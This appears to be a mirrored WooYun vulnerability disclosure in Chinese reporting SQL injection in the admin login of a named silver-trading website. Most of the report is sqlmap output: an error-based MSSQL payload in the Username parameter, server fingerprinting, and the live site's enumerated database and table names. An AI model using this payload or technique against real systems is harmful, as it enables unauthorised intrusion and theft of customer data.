乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-17: 细节已通知厂商并且等待厂商处理中 2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开
后台:http://www.ex-silver.com/Admin/Login.aspx
burp抓的包
用sqlmap跑了下数据库
[22:03:05] [INFO] parsing HTTP request from 'post.txt'[22:03:05] [INFO] resuming back-end DBMS 'microsoft sql server'[22:03:05] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: Username (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Username=test' AND 1092=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1092=1092) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'qdEN'='qdEN&Password=123456a&loginyzm=kit6&cSubmit=true---[22:03:05] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008[22:03:05] [INFO] fetching database names[22:03:05] [INFO] the SQL query used returns 11 entries[22:03:05] [INFO] resumed: exSilver[22:03:05] [INFO] resumed: ex-silver_0727[22:03:05] [INFO] resumed: ex-silver_0730[22:03:05] [INFO] resumed: ex-silver_31[22:03:05] [INFO] resumed: master[22:03:05] [INFO] resumed: model[22:03:05] [INFO] resumed: msdb[22:03:05] [INFO] resumed: ReportServer[22:03:05] [INFO] resumed: ReportServerTempDB[22:03:05] [INFO] resumed: SnailCMS[22:03:05] [INFO] resumed: tempdbavailable databases [11]:[*] ex-silver_0727[*] ex-silver_0730[*] ex-silver_31[*] exSilver[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] SnailCMS[*] tempdb
exSilver数据库里面的116个表
Database: exSilver[116 tables]+-----------------------------+| ActionLog || ActiveCustomers || Ad || Advertising || AnnualMeeting || Ballot || BallotIp || Banner || BuyInfo || CFTCSilver || CaiJinEvent || Calendar || CentralResult || ChangJIangColorNowPrice || ChinaCPI || ChinaGDP || ChinaPMI || ChinaPPI || ChinaSpend || Council || CountrySilver || CustAndNode || CustLevel || Customer || CustomerType || D99_CMD || D99_Tmp || DataBaiYinDingPanJia || DataDiaoJiZhongXin || DataDownload || DataGuiJinShuPrice || DataTouZiYinTiao || Englandbank || Europebank || Exchange || Famous || FedTable || FileInfo || FileType || FileTypeAndPersonnel || Fixedprice || Friendly || GSpotPrice || GoldETF || GoldETFStock || GoldProduction || Goldsupply || GuangDongSouthColorNowPrice || Guests || Holiday || HuaYin999 || HuaYin999_20150323 || Integrated || Investment || Japanbank || LevelInfo || LevelRole || Meeting || MenuPage || NetworkSelection || NetworkVoting || NewsKey || Nonferrous || OnlineCompany || OnlineUser || OuZhouWarGoldPrice || OuZhouWarSmallGold || PageWeb || PayAttention || PayAttentionOptions || Personnel || PersonnelFileType || PersonnelRole || PreviousMeeting || QuoteType || RealTimeQuotes || RegisterVip || Reportsummary || Research || Role || Rule || SellInfo || ShangHaiColorNowPrice || SilverData || SilverETF || SilverETF_20150617bak || SilverOutput || SilverOutputData || SilverPremium || Silveragio || Silverproduction || Silversupply || SoftwareDownload || Stock || SwapCenter || Template || ThematicInvestment || UKGDP || UsaAnnualGDP || UsaDataCentres || UsaHomesales || UsaIdleness || UsaPayrollsData || UsaPriceindex || UsaRetailsales || Userprice || V_SellInfo || WebNode || WebPage || Website_editor || applyfunc || base_price || business || pangolin_test_table || sqlmapoutput || yinfu |+-----------------------------+
Customer数据库里面的内容。
加强过滤验证
危害等级:无影响厂商忽略
忽略时间:2016-02-22 23:10
漏洞Rank:4 (WooYun评价)
暂无